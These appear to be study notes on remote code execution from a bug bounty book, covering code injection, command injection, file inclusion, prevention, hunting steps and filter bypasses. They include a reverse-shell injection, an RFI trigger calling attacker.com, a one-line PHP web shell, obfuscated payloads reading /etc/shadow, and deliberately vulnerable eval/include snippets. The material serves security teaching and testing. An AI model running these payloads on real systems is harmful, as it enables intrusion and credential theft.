====== BBC Ch 18: Remote Code Execution (RCE) ======

//Source: Bug Bounty Bootcamp by Vickie Li//

RCE lets an attacker execute arbitrary OS commands on the target server. It can be achieved via SQL injection, insecure deserialization, template injection, and two additional vectors covered here: code injection and file inclusion.

===== Code Injection =====

Occurs when user input is passed into an evaluated code function without sanitization.

**Python eval() example:**
<code python>
def calculate(input):
    return eval("{}".format(input))
```

Normal use: ''GET /calculator?calc=1+2'' returns ''3''.

Malicious use:
<code>
GET /calculator?calc="__import__('os').system('ls')"
```

**Command injection** (user input concatenated into shell command):
<code python>
os.system("wget -O- {}".format(url))
```

Inject via semicolon:
<code>
GET /download?url="google.com;bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"
```

===== File Inclusion =====

**Remote File Inclusion (RFI):** app includes a file from a user-supplied URL:
<code php>
$file = $_GET["page"];
include $file;
```

Host ''malicious.php'' on your server:
<code php>
<?PHP system($_GET["cmd"]); ?>
```

Trigger:
<code>
http://example.com/?page=http://attacker.com/malicious.php?cmd=id
```

**Local File Inclusion (LFI):** app prepends a directory and includes the result. Upload a shell to the server's uploads directory, then use path traversal:
<code>
http://example.com/?page=../uploads/USERNAME/malicious.php
```

===== Prevention =====

  * Avoid inserting user input into ''eval()'', ''exec()'', ''include()'', ''system()'', or similar
  * Use language APIs for OS operations instead of shell commands (e.g., PHP ''mkdir()'' vs ''system("mkdir ...")'')
  * Allowlist inputs to dangerous functions
  * Restrict file uploads to safe file types; host uploads in a separate environment from source code
  * Apply principle of least privilege to the web server process
  * Keep dependencies patched
  * Deploy a WAF

===== Hunting for RCE =====

==== Step 1: Recon ====

Identify the web server, programming language, and frameworks (see Ch5 recon techniques). RCE exploits are highly language-specific.

==== Step 2: Find Suspicious Input Locations ====

  * URL parameters passed into eval/exec/system
  * File-upload features where uploaded content might be executed
  * Input that determines a file path or filename to include

==== Step 3: Submit Test Payloads ====

**Python:**
<code>
print("RCE test!")
"__import__('os').system('ls')"
"__import__('os').system('sleep 10')"
```

**PHP:**
<code>
phpinfo();
<?php system("ls");?>
<?php system("sleep 10");?>
```

**Unix command injection:**
<code>
;ls;
| sleep 10;
& sleep 10;
` sleep 10;`
$(sleep 10)
```

**File inclusion:**
<code>
http://example.com/?page=http://attacker.com/malicious.php
http://example.com/?page=../uploads/malicious.php
http://example.com/?page=..%2fuploads%2fmalicious.php
```

==== Step 4: Confirm the Vulnerability ====

Classic RCE: execute ''whoami'' and check for ''www-data'' or similar in the response.
Blind RCE: execute ''sleep 5'' and measure the 5-second delay.

===== Escalating RCE =====

In a bug bounty context, **do not** attempt full privilege escalation -- read the program rules. Safe PoC options:
  * Execute ''whoami'' or ''ls''
  * Read ''/etc/passwd'' (world-readable; proves file access)
  * Create a file: ''touch rce_by_YOUR_NAME.txt''
  * For blind RCE: use ''sleep 5'' as PoC

Avoid reading sensitive customer data or modifying critical files.

===== Bypassing Input Filters =====

Unix payloads with quotes, wildcards, and empty substitutions (all read ''/etc/shadow''):
<code>
cat /etc/shadow
cat "/e"tc'/shadow'
cat /etc/sh*dow
cat /etc/sha``dow
cat /etc/sha$()dow
cat /etc/sha${}dow
```

PHP string concatenation and comments:
<code php>
('sys'.'tem')('cat /etc/shadow');
system/**/('ls');
'\x73\x79\x73\x74\x65\x6d'('ls');
```

Python equivalents:
<code>
__import__('os').system('cat /etc/shadow')
__import__('o'+'s').system('cat /etc/shadow')
__import__('\x6f\x73').system('cat /etc/shadow')
```

Split payload across duplicate parameters (server concatenates them):
<code>
GET /calculator?calc="__import__('os').sy"&calc="stem('ls')"
```

Additional bypass techniques: URL encoding, double URL encoding, null bytes, newlines, non-ASCII characters.

===== 6-Step Checklist =====

  - Recon: identify server language, frameworks, and technologies.
  - Find suspicious input locations: eval parameters, file inclusion paths, shell command wrappers, file uploads.
  - Submit test payloads targeting the identified language.
  - If blocked, try filter bypass techniques (quotes, wildcards, encoding, parameter splitting).
  - Confirm with harmless commands (''whoami'', ''ls'', ''sleep 5'') or file creation.
  - Draft report with working PoC; avoid reading sensitive data or modifying files beyond the PoC.